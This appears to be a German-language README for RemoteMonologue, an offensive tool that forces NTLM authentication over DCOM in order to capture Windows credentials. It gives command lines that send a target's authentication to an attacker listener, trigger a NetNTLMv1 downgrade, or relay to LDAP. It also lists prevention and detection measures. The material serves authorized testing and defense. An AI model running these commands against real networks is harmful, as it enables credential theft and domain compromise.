
DCOM für NTLM-Authentifizierungs-Coercions waffenwirksam machen
RemoteMonologue ist eine Technik zur Erfassung von Windows-Anmeldedaten, die eine Kompromittierung von Remote-Benutzern ermöglicht, indem sie den Interactive-User-RunAs-Schlüssel ausnutzt und NTLM-Authentifizierungen über DCOM erzwingt.
Lesen Sie X-Force Reds RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions für detaillierte Informationen.
🔹 Authentifizierungserzwingung über DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession), um eine NTLM-Authentifizierung gegen einen angegebenen Listener (-auth-to) auszulösen.🔹 Credential-Spraying (-spray)
🔹 NetNTLMv1-Downgrade-Angriff (-downgrade)
🔹 Missbrauch des WebClient-Dienstes (-webclient)
🔹 Benutzer-Enumeration (-query)
Hinweis: Lokale Administratorrechte auf dem Zielsystem sind erforderlich.
pip install impacket
Im Folgenden finden Sie ein Beispiel für die Ausführung von RemoteMonologue mit dem NetNTLMv1-Downgrade-Angriff, während Responder als Listener verwendet wird. Standardmäßig verwendet das Tool das DCOM-Objekt ServerDataCollectorSet, wenn keine DCOM-Option angegeben ist.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Im Folgenden finden Sie ein weiteres Beispiel: Diesmal wird der Angriff mit dem DCOM-Objekt FileSystemImage ausgeführt und der WebClient-Dienst aktiviert, um eine HTTP-Authentifizierung zu erhalten, die anschließend mit ntlmrelayx an LDAP weitergeleitet wird.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Zum Schutz vor und zur Erkennung dieser Techniken können mehrere vorbeugende Maßnahmen und Erkennungsmaßnahmen implementiert werden.
Vorbeugende Maßnahmen:
LDAP-Signierung und Channel Binding aktivieren: Konfigurieren Sie die erzwungene LDAP-Signierung und das Channel Binding auf Domänencontrollern, um den LDAP-Endpunkt vor Relay-Angriffen zu schützen. Hinweis: Diese Einstellungen werden standardmäßig ab Windows Server 2025 erzwungen.
Auf die neuesten Windows-Versionen aktualisieren: Aktualisieren Sie Server auf Windows Server 2025 und Arbeitsstationen auf Windows 11 Version 24H2, um NetNTLM-Downgrade-Angriffe zu entschärfen, da NTLMv1 in diesen Versionen entfernt wurde.
SMB-Signierung erzwingen: Aktivieren und erzwingen Sie die SMB-Signierung auf Windows-Servern, um SMB-Relay-Angriffe zu verhindern.
Starke Kennwortrichtlinien implementieren: Erzwingen Sie starke Kennwortanforderungen, um Angriffe zum Knacken von Kennwörtern zu erschweren.
Erkennungsmöglichkeiten:
Remote-Zugriff auf DCOM-Objekte überwachen: Verfolgen Sie den Zugriff auf die betroffenen DCOM-Objekte und deren spezifische Eigenschaften und Methoden, um ungewöhnliche Aktivitäten zu identifizieren.
Registrierungsänderungen überwachen: Überwachen Sie Änderungen an den Registrierungsschlüsseln RunAs und LmCompatibilityLevel.
WebClient-Dienstaktivität verfolgen: Überwachen Sie Fälle, in denen der WebClient-Dienst remote aktiviert wird, da dieser zur Ermöglichung HTTP-basierter NTLM-Authentifizierungen verwendet wird.